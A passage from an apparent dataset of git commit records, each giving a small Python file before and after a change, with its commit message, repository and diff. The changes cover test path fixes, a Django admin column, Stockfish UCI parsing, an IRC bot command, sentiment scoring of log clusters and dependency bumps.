+ self.max_value != other.max_value,
+ ])
+
+ def __contains__(self, x):
+ return self.min_value <= x <= self.max_value
def diff(self):
try:
|
7fdea303be0c3f182d0e99719c89975294112975
|
test/test_basic.py
|
test/test_basic.py
|
#!/usr/bin/env python
# vim: set ts=4 sw=4 et sts=4 ai:
#
# Test some basic functionality.
#
import unittest
import os
import sys
sys.path.append('..')
class TestQBasic(unittest.TestCase):
def setUp(self):
if os.path.exists('/tmp/q'):
os.remove('/tmp/q')
def tearDown(self):
self.setUp()
def assertInQLog(self, string):
self.assertTrue(os.path.exists('/tmp/q'))
logdata = open('/tmp/q', 'r').read()
try:
self.assertIn(string, logdata)
except AttributeError:
self.assertTrue(string in logdata)
def test_q_log_message(self):
import q
q.q('Test message')
self.assertInQLog('Test message')
def test_q_function_call(self):
import q
@q.t
def test(arg):
return 'RetVal'
self.assertEqual('RetVal', test('ArgVal'))
self.assertInQLog('ArgVal')
self.assertInQLog('RetVal')
unittest.main()
|
#!/usr/bin/env python
# vim: set ts=4 sw=4 et sts=4 ai:
#
# Test some basic functionality.
#
import unittest
import os
import sys
qpath = os.path.abspath(os.path.join(os.path.split(__file__)[0],'..'))
sys.path.insert(0, qpath)
class TestQBasic(unittest.TestCase):
def setUp(self):
if os.path.exists('/tmp/q'):
os.remove('/tmp/q')
def tearDown(self):
self.setUp()
def assertInQLog(self, string):
self.assertTrue(os.path.exists('/tmp/q'))
logdata = open('/tmp/q', 'r').read()
try:
self.assertIn(string, logdata)
except AttributeError:
self.assertTrue(string in logdata)
def test_q_log_message(self):
import q
q.q('Test message')
self.assertInQLog('Test message')
def test_q_function_call(self):
import q
@q.t
def test(arg):
return 'RetVal'
self.assertEqual('RetVal', test('ArgVal'))
self.assertInQLog('ArgVal')
self.assertInQLog('RetVal')
unittest.main()
|
Make test call location independent.
|
Make test call location independent.
|
Python
|
apache-2.0
|
zestyping/q
|
---
+++
@@ -7,7 +7,9 @@
import unittest
import os
import sys
-sys.path.append('..')
+
+qpath = os.path.abspath(os.path.join(os.path.split(__file__)[0],'..'))
+sys.path.insert(0, qpath)
class TestQBasic(unittest.TestCase):
|
2ee34d2d74a8fb41dfe49cd3933d0d7abb25fee4
|
rsvp/admin.py
|
rsvp/admin.py
|
from django.contrib import admin
from rsvp.models import Guest, Location, Table, Event, Hotel, Party, Song
class AdminModel(admin.ModelAdmin):
list_display = ['name']
class GuestAdmin(admin.ModelAdmin):
list_display = ['last_name', 'first_name']
list_filter = ['last_name', 'first_name']
search_fields = ['last_name', 'first_name', ]
save_on_top = True
class LocationAdmin(AdminModel):
pass
class TableAdmin(AdminModel):
pass
class EventAdmin(AdminModel):
pass
class HotelAdmin(AdminModel):
pass
class PartyAdmin(admin.ModelAdmin):
filter_horizontal = ('guests',)
list_display = ['name', 'responded']
class SongAdmin(admin.ModelAdmin):
list_display = ['title', 'artist', 'votes']
admin.site.register(Guest, GuestAdmin)
admin.site.register(Location, LocationAdmin)
admin.site.register(Table, TableAdmin)
admin.site.register(Event, EventAdmin)
admin.site.register(Hotel, HotelAdmin)
admin.site.register(Party, PartyAdmin)
admin.site.register(Song, SongAdmin)
|
from django.contrib import admin
from rsvp.models import Guest, Location, Table, Event, Hotel, Party, Song
class AdminModel(admin.ModelAdmin):
list_display = ['name']
class GuestAdmin(admin.ModelAdmin):
list_display = ['last_name', 'first_name', 'attending', ]
list_filter = ['last_name', 'first_name']
search_fields = ['last_name', 'first_name', ]
save_on_top = True
class LocationAdmin(AdminModel):
pass
class TableAdmin(AdminModel):
pass
class EventAdmin(AdminModel):
pass
class HotelAdmin(AdminModel):
pass
class PartyAdmin(admin.ModelAdmin):
filter_horizontal = ('guests',)
list_display = ['name', 'responded']
class SongAdmin(admin.ModelAdmin):
list_display = ['title', 'artist', 'votes']
admin.site.register(Guest, GuestAdmin)
admin.site.register(Location, LocationAdmin)
admin.site.register(Table, TableAdmin)
admin.site.register(Event, EventAdmin)
admin.site.register(Hotel, HotelAdmin)
admin.site.register(Party, PartyAdmin)
admin.site.register(Song, SongAdmin)
|
Add attending as column to Guest
|
Add attending as column to Guest
|
Python
|
mit
|
gboone/wedding.harmsboone.org,gboone/wedding.harmsboone.org
|
---
+++
@@ -5,7 +5,7 @@
list_display = ['name']
class GuestAdmin(admin.ModelAdmin):
- list_display = ['last_name', 'first_name']
+ list_display = ['last_name', 'first_name', 'attending', ]
list_filter = ['last_name', 'first_name']
search_fields = ['last_name', 'first_name', ]
save_on_top = True
|
181ac9d91d826b1c1a71ec14ff8f500cb79261d2
|
Code/Evaluator.py
|
Code/Evaluator.py
|
import subprocess
ENGINE_BIN = "stockfish"
DEPTH = 20
def evaluate_position(board, depth=DEPTH):
"""Evaluates the board's current position.
Returns the Stockfish scalar score, at the given depth, in centipawns.
"""
engine = subprocess.Popen(ENGINE_BIN, bufsize=0, universal_newlines=True,
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# take care of initial (credits) line
engine.stdout.readline()
# search from current position to given depth
engine.stdin.write("position fen "+board.fen()+"\n")
engine.stdin.write("go depth "+str(DEPTH)+"\n")
last_line = ""
while True:
line = engine.stdout.readline().strip()
if "bestmove" in line:
break
else:
last_line = line
engine.stdin.write("quit\n")
# score in centipawns
score = last_line.split()[9]
return score
|
import subprocess
import re
ENGINE_BIN = "stockfish"
DEPTH = 20
def evaluate_position(board, depth=DEPTH):
"""Evaluates the board's current position.
Returns the Stockfish scalar score, at the given depth, in centipawns.
"""
engine = subprocess.Popen(ENGINE_BIN, bufsize=0, universal_newlines=True,
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# take care of initial (credits) line
engine.stdout.readline()
# search from current position to given depth
engine.stdin.write("position fen "+board.fen()+"\n")
engine.stdin.write("go depth "+str(DEPTH)+"\n")
while True:
line = engine.stdout.readline().strip()
if line.startswith("info") and (" depth "+str(DEPTH)) in line \
and "score cp" in line and "bound" not in line:
break
engine.stdin.write("quit\n")
# score in centipawns
matcher = re.match(".*score cp ([0-9]+).*", line)
score = int(matcher.group(1))
return score
|
Correct UCI parsing in board state evaluation function
|
Correct UCI parsing in board state evaluation function
|
Python
|
mit
|
Bojanovski/ChessANN
|
---
+++
@@ -1,4 +1,5 @@
import subprocess
+import re
ENGINE_BIN = "stockfish"
DEPTH = 20
@@ -19,17 +20,15 @@
engine.stdin.write("position fen "+board.fen()+"\n")
engine.stdin.write("go depth "+str(DEPTH)+"\n")
- last_line = ""
while True:
line = engine.stdout.readline().strip()
- if "bestmove" in line:
+ if line.startswith("info") and (" depth "+str(DEPTH)) in line \
+ and "score cp" in line and "bound" not in line:
break
- else:
- last_line = line
engine.stdin.write("quit\n")
# score in centipawns
- score = last_line.split()[9]
-
+ matcher = re.match(".*score cp ([0-9]+).*", line)
+ score = int(matcher.group(1))
return score
|
cda417454578cb8efe315850b06b047239c7796d
|
Commands/Leave.py
|
Commands/Leave.py
|
# -*- coding: utf-8 -*-
"""
Created on Dec 20, 2011
@author: Tyranic-Moron
"""
from IRCMessage import IRCMessage
from IRCResponse import IRCResponse, ResponseType
from CommandInterface import CommandInterface
import GlobalVars
class Leave(CommandInterface):
triggers = ['leave', 'gtfo']
help = "leave/gtfo - makes the bot leave the current channel"
def execute(self, message):
"""
@type message: IRCMessage
"""
if message.User.Name not in GlobalVars.admins:
return IRCResponse(ResponseType.Say, 'Only my admins can tell me to %s' % message.Command, message.ReplyTo)
if len(message.ParameterList) > 0:
return IRCResponse(ResponseType.Raw, 'PART %s :%s' % (message.ReplyTo, message.Parameters), '')
else:
return IRCResponse(ResponseType.Raw, 'PART %s :toodles!' % message.ReplyTo, '')
|
# -*- coding: utf-8 -*-
"""
Created on Dec 20, 2011
@author: Tyranic-Moron
"""
from IRCMessage import IRCMessage
from IRCResponse import IRCResponse, ResponseType
from CommandInterface import CommandInterface
import GlobalVars
class Leave(CommandInterface):
triggers = ['leave', 'gtfo']
help = "leave/gtfo - makes the bot leave the current channel"
def execute(self, message):
"""
@type message: IRCMessage
"""
if message.User.Name not in GlobalVars.admins:
if message.Command == triggers[1]:
return IRCResponse(ResponseType.Say, 'Wow, rude? Only my admins can tell me to {}'.format(message.Command), message.ReplyTo)
else:
return IRCResponse(ResponseType.Say, 'Only my admins can tell me to {}'.format(message.Command), message.ReplyTo)
if len(message.ParameterList) > 0:
return IRCResponse(ResponseType.Raw, 'PART {} :{}'.format(message.ReplyTo, message.Parameters), '')
else:
return IRCResponse(ResponseType.Raw, 'PART {} :toodles!'.format(message.ReplyTo), '')
|
Update % to .format, add response to gtfo command
|
Update % to .format, add response to gtfo command
|
Python
|
mit
|
MatthewCox/PyMoronBot,DesertBot/DesertBot
|
---
+++
@@ -20,9 +20,12 @@
@type message: IRCMessage
"""
if message.User.Name not in GlobalVars.admins:
- return IRCResponse(ResponseType.Say, 'Only my admins can tell me to %s' % message.Command, message.ReplyTo)
+ if message.Command == triggers[1]:
+ return IRCResponse(ResponseType.Say, 'Wow, rude? Only my admins can tell me to {}'.format(message.Command), message.ReplyTo)
+ else:
+ return IRCResponse(ResponseType.Say, 'Only my admins can tell me to {}'.format(message.Command), message.ReplyTo)
if len(message.ParameterList) > 0:
- return IRCResponse(ResponseType.Raw, 'PART %s :%s' % (message.ReplyTo, message.Parameters), '')
+ return IRCResponse(ResponseType.Raw, 'PART {} :{}'.format(message.ReplyTo, message.Parameters), '')
else:
- return IRCResponse(ResponseType.Raw, 'PART %s :toodles!' % message.ReplyTo, '')
+ return IRCResponse(ResponseType.Raw, 'PART {} :toodles!'.format(message.ReplyTo), '')
|
e5ed3e877e24d943096fa5e48c1f8c9bc30c3160
|
flask_annex/__init__.py
|
flask_annex/__init__.py
|
from .base import AnnexBase
__all__ = ('Annex',)
# -----------------------------------------------------------------------------
def get_annex_class(storage):
if storage == 'file':
from .file import FileAnnex
return FileAnnex
else:
raise ValueError("unsupported storage {}".format(storage))
# -----------------------------------------------------------------------------
class Annex(AnnexBase):
def __init__(self, storage, **kwargs):
annex_class = get_annex_class(storage)
# Proxy the actual implementation to prevent use of storage-specific
# attributes when using the generic annex.
self._impl = annex_class(**kwargs)
def save_file(self, key, filename):
return self._impl.save_file(key, filename)
def send_file(self, key, **options):
return self._impl.send_file(key, **options)
|
from .base import AnnexBase
from . import utils
__all__ = ('Annex',)
# -----------------------------------------------------------------------------
def get_annex_class(storage):
if storage == 'file':
from .file import FileAnnex
return FileAnnex
else:
raise ValueError("unsupported storage {}".format(storage))
# -----------------------------------------------------------------------------
class Annex(AnnexBase):
def __init__(self, storage, **kwargs):
annex_class = get_annex_class(storage)
# Proxy the actual implementation to prevent use of storage-specific
# attributes when using the generic annex.
self._impl = annex_class(**kwargs)
@classmethod
def from_env(cls, namespace):
storage = utils.get_config_from_env(namespace)['storage']
# Use storage-specific env namespace when configuring a generic annex,
# to avoid having unrecognized extra keys when changing storage.
storage_namespace = '{}_{}'.format(namespace, storage.upper())
storage_config = utils.get_config_from_env(storage_namespace)
return cls(storage, **storage_config)
def save_file(self, key, filename):
return self._impl.save_file(key, filename)
def send_file(self, key, **options):
return self._impl.send_file(key, **options)
|
Use storage sub-namespace for generic annex
|
Use storage sub-namespace for generic annex
|
Python
|
mit
|
4Catalyzer/flask-annex,taion/flask-annex
|
---
+++
@@ -1,4 +1,5 @@
from .base import AnnexBase
+from . import utils
__all__ = ('Annex',)
@@ -24,6 +25,17 @@
# attributes when using the generic annex.
self._impl = annex_class(**kwargs)
+ @classmethod
+ def from_env(cls, namespace):
+ storage = utils.get_config_from_env(namespace)['storage']
+
+ # Use storage-specific env namespace when configuring a generic annex,
+ # to avoid having unrecognized extra keys when changing storage.
+ storage_namespace = '{}_{}'.format(namespace, storage.upper())
+ storage_config = utils.get_config_from_env(storage_namespace)
+
+ return cls(storage, **storage_config)
+
def save_file(self, key, filename):
return self._impl.save_file(key, filename)
|
f3c7504cf3c7982e295883ccf5448e19c1ba2814
|
pygraphc/anomaly/SentimentAnalysis.py
|
pygraphc/anomaly/SentimentAnalysis.py
|
from textblob import TextBlob
class SentimentAnalysis(object):
"""Get sentiment analysis with only positive and negative considered.
Positive means normal logs and negative sentiment refers to possible attacks.
This class uses sentiment analysis feature from the TextBlob library [Loria2016]_.
References
----------
.. [Loria2016] Steven Loria and the contributors, TextBlob: Simple, Pythonic, text processing--Sentiment analysis,
part-of-speech tagging, noun phrase extraction, translation, and more.
https://github.com/sloria/TextBlob/
"""
def __init__(self, log_message):
self.log_message = log_message
def get_sentiment(self):
"""Get negative or positive sentiment.
Returns
-------
sentiment_score : tuple
A tuple containing (sentiment, polarity score).
"""
possible_sentiment = TextBlob(self.log_message)
sentiment_score = None
if possible_sentiment.sentiment.polarity >= 0.:
sentiment_score = ('positive', possible_sentiment.sentiment.polarity)
elif possible_sentiment.sentiment.polarity < 0.:
sentiment_score = ('negative', possible_sentiment.sentiment.polarity)
return sentiment_score
|
from textblob import TextBlob
class SentimentAnalysis(object):
"""Get sentiment analysis with only positive and negative considered.
Positive means normal logs and negative sentiment refers to possible attacks.
This class uses sentiment analysis feature from the TextBlob library [Loria2016]_.
References
----------
.. [Loria2016] Steven Loria and the contributors, TextBlob: Simple, Pythonic, text processing--Sentiment analysis,
part-of-speech tagging, noun phrase extraction, translation, and more.
https://github.com/sloria/TextBlob/
"""
def __init__(self, cluster_message):
self.cluster_message = cluster_message
def get_sentiment(self):
"""Get negative or positive sentiment.
Default score for sentiment score is -1 to 1. The value that close to 1 means more positive and vice versa.
Returns
-------
sentiment_score : dict
A dictionary containing key: cluster id and value: sentiment score.
"""
sentiment_score = {}
for cluster_id, message in self.cluster_message.iteritems():
possible_sentiment = TextBlob(message)
if possible_sentiment.sentiment.polarity >= 0.:
sentiment_score[cluster_id] = possible_sentiment.sentiment.polarity
elif possible_sentiment.sentiment.polarity < 0.:
sentiment_score[cluster_id] = possible_sentiment.sentiment.polarity
return sentiment_score
def get_normalized_sentiment(self):
"""Get normalized sentiment score.
Returns
-------
normalized_score : dict
A dictionary containing key: cluster id and value: normalized sentiment score.
"""
sentiment_score = self.get_sentiment()
normalized_score = {}
min_score = min(sentiment_score.values())
max_score = max(sentiment_score.values())
for cluster_id, score in sentiment_score.iteritems():
normalized_score[cluster_id] = (score - min_score) / (max_score - min_score)
return normalized_score
|
Edit get_sentiment and add get_normalized_sentiment
|
Edit get_sentiment and add get_normalized_sentiment
|
Python
|
mit
|
studiawan/pygraphc
|
---
+++
@@ -13,22 +13,42 @@
part-of-speech tagging, noun phrase extraction, translation, and more.
https://github.com/sloria/TextBlob/
"""
- def __init__(self, log_message):
- self.log_message = log_message
+ def __init__(self, cluster_message):
+ self.cluster_message = cluster_message
def get_sentiment(self):
"""Get negative or positive sentiment.
+ Default score for sentiment score is -1 to 1. The value that close to 1 means more positive and vice versa.
+
Returns
-------
- sentiment_score : tuple
- A tuple containing (sentiment, polarity score).
+ sentiment_score : dict
+ A dictionary containing key: cluster id and value: sentiment score.
"""
- possible_sentiment = TextBlob(self.log_message)
- sentiment_score = None
- if possible_sentiment.sentiment.polarity >= 0.:
- sentiment_score = ('positive', possible_sentiment.sentiment.polarity)
- elif possible_sentiment.sentiment.polarity < 0.:
- sentiment_score = ('negative', possible_sentiment.sentiment.polarity)
+ sentiment_score = {}
+ for cluster_id, message in self.cluster_message.iteritems():
+ possible_sentiment = TextBlob(message)
+ if possible_sentiment.sentiment.polarity >= 0.:
+ sentiment_score[cluster_id] = possible_sentiment.sentiment.polarity
+ elif possible_sentiment.sentiment.polarity < 0.:
+ sentiment_score[cluster_id] = possible_sentiment.sentiment.polarity
return sentiment_score
+
+ def get_normalized_sentiment(self):
+ """Get normalized sentiment score.
+
+ Returns
+ -------
+ normalized_score : dict
+ A dictionary containing key: cluster id and value: normalized sentiment score.
+ """
+ sentiment_score = self.get_sentiment()
+ normalized_score = {}
+ min_score = min(sentiment_score.values())
+ max_score = max(sentiment_score.values())
+ for cluster_id, score in sentiment_score.iteritems():
+ normalized_score[cluster_id] = (score - min_score) / (max_score - min_score)
+
+ return normalized_score
|
3c93685eec3f6f293c3843d5c47b556426d4007e
|
test/settings/gyptest-settings.py
|
test/settings/gyptest-settings.py
|
#!/usr/bin/env python
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Smoke-tests 'settings' blocks.
"""
import TestGyp
test = TestGyp.TestGyp()
test.run_gyp('settings.gyp')
test.build('test.gyp', test.ALL)
test.pass_test()
|
#!/usr/bin/env python
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Smoke-tests 'settings' blocks.
"""
import TestGyp
# 'settings' is only supported for make and scons (and will be removed there as
# well eventually).
test = TestGyp.TestGyp(formats=['make', 'scons'])
test.run_gyp('settings.gyp')
test.build('test.gyp', test.ALL)
test.pass_test()
|
Make new settings test not run for xcode generator.
|
Make new settings test not run for xcode generator.
TBR=evan
Review URL: http://codereview.chromium.org/7472006
|
Python
|
bsd-3-clause
|
old8xp/gyp_from_google,old8xp/gyp_from_google,old8xp/gyp_from_google,old8xp/gyp_from_google,old8xp/gyp_from_google
|
---
+++
@@ -10,7 +10,9 @@
import TestGyp
-test = TestGyp.TestGyp()
+# 'settings' is only supported for make and scons (and will be removed there as
+# well eventually).
+test = TestGyp.TestGyp(formats=['make', 'scons'])
test.run_gyp('settings.gyp')
test.build('test.gyp', test.ALL)
test.pass_test()
|
314c6bf4159d4a84e76635a441fb62dba0122b2f
|
tests/test_version.py
|
tests/test_version.py
|
# Tests
import os
from tests.base import BaseTestZSTD
class TestZSTD(BaseTestZSTD):
def setUp(self):
if os.getenv("ZSTD_EXTERNAL"):
self.ZSTD_EXTERNAL = True
self.VERSION = os.getenv("VERSION")
self.PKG_VERSION = os.getenv("PKG_VERSION")
v = [int(n) for n in self.VERSION.split(".")]
v = sorted(v, reverse=True)
self.VERSION_INT = 0
i = 0
for n in v:
self.VERSION_INT += n * 100**i
i += 1
def test_module_version(self):
BaseTestZSTD.helper_version(self)
def test_library_version(self):
BaseTestZSTD.helper_zstd_version(self)
def test_library_version_number(self):
BaseTestZSTD.helper_zstd_version_number(self)
if __name__ == '__main__':
unittest.main()
|
# Tests
import os
from tests.base import BaseTestZSTD, log
class TestZSTD(BaseTestZSTD):
def setUp(self):
if os.getenv("ZSTD_EXTERNAL"):
self.ZSTD_EXTERNAL = True
self.VERSION = os.getenv("VERSION")
self.PKG_VERSION = os.getenv("PKG_VERSION")
log.info("VERSION=%r" % self.VERSION)
log.info("PKG_VERSION=%r" % self.PKG_VERSION)
v = [int(n) for n in reversed(self.VERSION.split("."))]
log.info("v=%r" % (v,))
self.VERSION_INT = 0
i = 0
for n in v:
self.VERSION_INT += n * 100**i
i += 1
log.info("VERSION_INT=%r" % self.VERSION_INT)
def test_module_version(self):
BaseTestZSTD.helper_version(self)
def test_library_version(self):
BaseTestZSTD.helper_zstd_version(self)
def test_library_version_number(self):
BaseTestZSTD.helper_zstd_version_number(self)
if __name__ == '__main__':
unittest.main()
|
Fix version tests - don't sort, just reverse
|
Fix version tests - don't sort, just reverse
|
Python
|
bsd-2-clause
|
sergey-dryabzhinsky/python-zstd,sergey-dryabzhinsky/python-zstd
|
---
+++
@@ -2,7 +2,7 @@
import os
-from tests.base import BaseTestZSTD
+from tests.base import BaseTestZSTD, log
class TestZSTD(BaseTestZSTD):
@@ -11,13 +11,16 @@
self.ZSTD_EXTERNAL = True
self.VERSION = os.getenv("VERSION")
self.PKG_VERSION = os.getenv("PKG_VERSION")
- v = [int(n) for n in self.VERSION.split(".")]
- v = sorted(v, reverse=True)
+ log.info("VERSION=%r" % self.VERSION)
+ log.info("PKG_VERSION=%r" % self.PKG_VERSION)
+ v = [int(n) for n in reversed(self.VERSION.split("."))]
+ log.info("v=%r" % (v,))
self.VERSION_INT = 0
i = 0
for n in v:
self.VERSION_INT += n * 100**i
i += 1
+ log.info("VERSION_INT=%r" % self.VERSION_INT)
def test_module_version(self):
BaseTestZSTD.helper_version(self)
|
0527cea9db518b5b8fb63fe2bb3792a806fa421d
|
src/python/setup.py
|
src/python/setup.py
|
__author__ = 'tom'
from setuptools import setup
# Makes use of the sphinx and sphinx-pypi-upload packages. To build for local development
# use 'python setup.py develop'. To upload a version to pypi use 'python setup.py clean sdist upload'.
# To build docs use 'python setup.py build_sphinx' and to upload docs to pythonhosted.org use
# 'python setup.py upload_sphinx'. Both uploads require 'python setup.py register' to be run, and will
# only work for Tom as they need the pypi account credentials.
setup(
name='approxeng.input',
version='0.6',
description='Python game controller support using evDev for Raspberry Pi and other Linux systems',
classifiers=['Programming Language :: Python :: 2.7'],
url='https://github.com/ApproxEng/approxeng.input/',
author='Tom Oinn',
author_email='tomoinn@gmail.com',
license='ASL2.0',
packages=['approxeng.input'],
install_requires=['evdev==0.5.0'],
include_package_data=True,
test_suite='nose.collector',
tests_require=['nose'],
dependency_links=[],
zip_safe=False)
|
__author__ = 'tom'
from setuptools import setup
# Makes use of the sphinx and sphinx-pypi-upload packages. To build for local development
# use 'python setup.py develop'. To upload a version to pypi use 'python setup.py clean sdist upload'.
# To build docs use 'python setup.py build_sphinx' and to upload docs to pythonhosted.org use
# 'python setup.py upload_sphinx'. Both uploads require 'python setup.py register' to be run, and will
# only work for Tom as they need the pypi account credentials.
setup(
name='approxeng.input',
version='0.6',
description='Python game controller support using evDev for Raspberry Pi and other Linux systems',
classifiers=['Programming Language :: Python :: 2.7'],
url='https://github.com/ApproxEng/approxeng.input/',
author='Tom Oinn',
author_email='tomoinn@gmail.com',
license='ASL2.0',
packages=['approxeng.input'],
install_requires=['evdev==0.6.4'],
include_package_data=True,
test_suite='nose.collector',
tests_require=['nose'],
dependency_links=[],
zip_safe=False)
|
Change to use evdev 0.6.4
|
Change to use evdev 0.6.4
Signed-off-by: tom <3abfbc22eec6ecd173d744487905db1fa6a502d5@gmail.com>
|
Python
|
apache-2.0
|
ApproxEng/approxeng.input
|
---
+++
@@ -17,7 +17,7 @@
author_email='tomoinn@gmail.com',
license='ASL2.0',
packages=['approxeng.input'],
- install_requires=['evdev==0.5.0'],
+ install_requires=['evdev==0.6.4'],
include_package_data=True,
test_suite='nose.collector',
tests_require=['nose'],
|
faf067ec4f5189a7a0b12fc78b62373a8f997ac8
|
scripts/migration/migrate_index_for_existing_files.py
|
scripts/migration/migrate_index_for_existing_files.py
|
"""
Saves every file to have new save() logic index those files.
"""
import sys
import logging
from website.app import init_app
from website.files.models.osfstorage import OsfStorageFile
logger = logging.getLogger(__name__)
def main():
init_app(routes=False)
dry_run = 'dry' in sys.argv
logger.warn('Current files will now be updated to be indexed if necessary')
if dry_run:
logger.warn('Dry_run mode')
for file_ in OsfStorageFile.find():
logger.info('File with _id {0} and name {1} has been saved.'.format(file_._id, file_.name))
if not dry_run:
file_.save()
if __name__ == '__main__':
main()
|
"""
Saves every file to have new save() logic index those files.
"""
import sys
import logging
from website.app import init_app
from website.search import search
from website.files.models.osfstorage import OsfStorageFile
logger = logging.getLogger(__name__)
def main():
init_app(routes=False)
dry_run = 'dry' in sys.argv
logger.warn('Current files will now be updated to be indexed if necessary')
if dry_run:
logger.warn('Dry_run mode')
for file_ in OsfStorageFile.find():
logger.info('File with _id {0} and name {1} has been saved.'.format(file_._id, file_.name))
if not dry_run:
search.update_file(file_)
if __name__ == '__main__':
main()
|
Change migration to update_file rather than save it
|
Change migration to update_file rather than save it
|
Python
|
apache-2.0
|
billyhunt/osf.io,brianjgeiger/osf.io,zachjanicki/osf.io,brandonPurvis/osf.io,haoyuchen1992/osf.io,abought/osf.io,caseyrygt/osf.io,crcresearch/osf.io,mluo613/osf.io,caneruguz/osf.io,zamattiac/osf.io,danielneis/osf.io,leb2dg/osf.io,kwierman/osf.io,SSJohns/osf.io,aaxelb/osf.io,haoyuchen1992/osf.io,HalcyonChimera/osf.io,amyshi188/osf.io,rdhyee/osf.io,felliott/osf.io,saradbowman/osf.io,chennan47/osf.io,baylee-d/osf.io,CenterForOpenScience/osf.io,GageGaskins/osf.io,leb2dg/osf.io,mattclark/osf.io,felliott/osf.io,leb2dg/osf.io,binoculars/osf.io,binoculars/osf.io,kch8qx/osf.io,KAsante95/osf.io,alexschiller/osf.io,samchrisinger/osf.io,CenterForOpenScience/osf.io,GageGaskins/osf.io,cslzchen/osf.io,caseyrollins/osf.io,mluke93/osf.io,alexschiller/osf.io,zachjanicki/osf.io,KAsante95/osf.io,danielneis/osf.io,emetsger/osf.io,mluke93/osf.io,haoyuchen1992/osf.io,emetsger/osf.io,jnayak1/osf.io,laurenrevere/osf.io,mfraezz/osf.io,monikagrabowska/osf.io,acshi/osf.io,brandonPurvis/osf.io,HalcyonChimera/osf.io,jnayak1/osf.io,samchrisinger/osf.io,kch8qx/osf.io,mluo613/osf.io,samanehsan/osf.io,wearpants/osf.io,DanielSBrown/osf.io,hmoco/osf.io,caneruguz/osf.io,asanfilippo7/osf.io,baylee-d/osf.io,adlius/osf.io,Johnetordoff/osf.io,acshi/osf.io,Nesiehr/osf.io,alexschiller/osf.io,caseyrygt/osf.io,chrisseto/osf.io,abought/osf.io,aaxelb/osf.io,doublebits/osf.io,DanielSBrown/osf.io,caneruguz/osf.io,SSJohns/osf.io,GageGaskins/osf.io,emetsger/osf.io,felliott/osf.io,kch8qx/osf.io,TomHeatwole/osf.io,rdhyee/osf.io,Ghalko/osf.io,brandonPurvis/osf.io,monikagrabowska/osf.io,kch8qx/osf.io,doublebits/osf.io,ZobairAlijan/osf.io,Johnetordoff/osf.io,Ghalko/osf.io,acshi/osf.io,Johnetordoff/osf.io,brandonPurvis/osf.io,monikagrabowska/osf.io,crcresearch/osf.io,samanehsan/osf.io,laurenrevere/osf.io,wearpants/osf.io,samanehsan/osf.io,laurenrevere/osf.io,SSJohns/osf.io,pattisdr/osf.io,acshi/osf.io,felliott/osf.io,TomHeatwole/osf.io,danielneis/osf.io,monikagrabowska/osf.io,doublebits/osf.io,TomHeatwole/osf.io,pattisdr/osf.io,Johnetordoff/osf.io,leb2dg/osf.io,caseyrygt/osf.io,SSJohns/osf.io,ZobairAlijan/osf.io,ticklemepierce/osf.io,crcresearch/osf.io,brandonPurvis/osf.io,zamattiac/osf.io,mattclark/osf.io,asanfilippo7/osf.io,amyshi188/osf.io,emetsger/osf.io,mfraezz/osf.io,zachjanicki/osf.io,billyhunt/osf.io,jnayak1/osf.io,mluo613/osf.io,abought/osf.io,GageGaskins/osf.io,kch8qx/osf.io,erinspace/osf.io,doublebits/osf.io,hmoco/osf.io,monikagrabowska/osf.io,adlius/osf.io,KAsante95/osf.io,RomanZWang/osf.io,mluo613/osf.io,asanfilippo7/osf.io,icereval/osf.io,danielneis/osf.io,caseyrygt/osf.io,DanielSBrown/osf.io,sloria/osf.io,ZobairAlijan/osf.io,aaxelb/osf.io,cwisecarver/osf.io,chrisseto/osf.io,samanehsan/osf.io,chennan47/osf.io,zachjanicki/osf.io,adlius/osf.io,chrisseto/osf.io,doublebits/osf.io,RomanZWang/osf.io,abought/osf.io,cslzchen/osf.io,mluo613/osf.io,HalcyonChimera/osf.io,KAsante95/osf.io,cwisecarver/osf.io,amyshi188/osf.io,Nesiehr/osf.io,ticklemepierce/osf.io,mattclark/osf.io,CenterForOpenScience/osf.io,amyshi188/osf.io,chennan47/osf.io,TomBaxter/osf.io,jnayak1/osf.io,ticklemepierce/osf.io,caseyrollins/osf.io,brianjgeiger/osf.io,chrisseto/osf.io,brianjgeiger/osf.io,samchrisinger/osf.io,ZobairAlijan/osf.io,saradbowman/osf.io,wearpants/osf.io,cslzchen/osf.io,adlius/osf.io,billyhunt/osf.io,alexschiller/osf.io,rdhyee/osf.io,zamattiac/osf.io,CenterForOpenScience/osf.io,mluke93/osf.io,pattisdr/osf.io,alexschiller/osf.io,erinspace/osf.io,rdhyee/osf.io,RomanZWang/osf.io,GageGaskins/osf.io,samchrisinger/osf.io,RomanZWang/osf.io,RomanZWang/osf.io,mfraezz/osf.io,icereval/osf.io,Nesiehr/osf.io,caseyrollins/osf.io,binoculars/osf.io,KAsante95/osf.io,Ghalko/osf.io,Ghalko/osf.io,Nesiehr/osf.io,billyhunt/osf.io,ticklemepierce/osf.io,TomBaxter/osf.io,hmoco/osf.io,asanfilippo7/osf.io,cwisecarver/osf.io,baylee-d/osf.io,icereval/osf.io,haoyuchen1992/osf.io,kwierman/osf.io,DanielSBrown/osf.io,brianjgeiger/osf.io,TomHeatwole/osf.io,sloria/osf.io,mfraezz/osf.io,cslzchen/osf.io,hmoco/osf.io,zamattiac/osf.io,erinspace/osf.io,wearpants/osf.io,aaxelb/osf.io,mluke93/osf.io,sloria/osf.io,acshi/osf.io,TomBaxter/osf.io,cwisecarver/osf.io,kwierman/osf.io,caneruguz/osf.io,kwierman/osf.io,HalcyonChimera/osf.io,billyhunt/osf.io
|
---
+++
@@ -5,6 +5,7 @@
import logging
from website.app import init_app
+from website.search import search
from website.files.models.osfstorage import OsfStorageFile
logger = logging.getLogger(__name__)
@@ -19,7 +20,7 @@
for file_ in OsfStorageFile.find():
logger.info('File with _id {0} and name {1} has been saved.'.format(file_._id, file_.name))
if not dry_run:
- file_.save()
+ search.update_file(file_)
if __name__ == '__main__':
main()
|
df4a437142be6dff08c7039c1b586391c922f70e
|
tests/main/views/test_feedback.py
|
tests/main/views/test_feedback.py
|
import mock
from ...helpers import BaseApplicationTest
class TestFeedbackForm(BaseApplicationTest):
def _post(self):
return self.client.post('/feedback', data={
'uri': 'test:some-uri',
'what_doing': 'test: what doing text',
'what_happened': 'test: what happened text'})
@mock.patch('requests.post')
def test_google_gone_gives_503(self, external_requests_post):
assert self._post().status_code == 503
@mock.patch('requests.post')
def test_feedback_submission(self, external_requests_post):
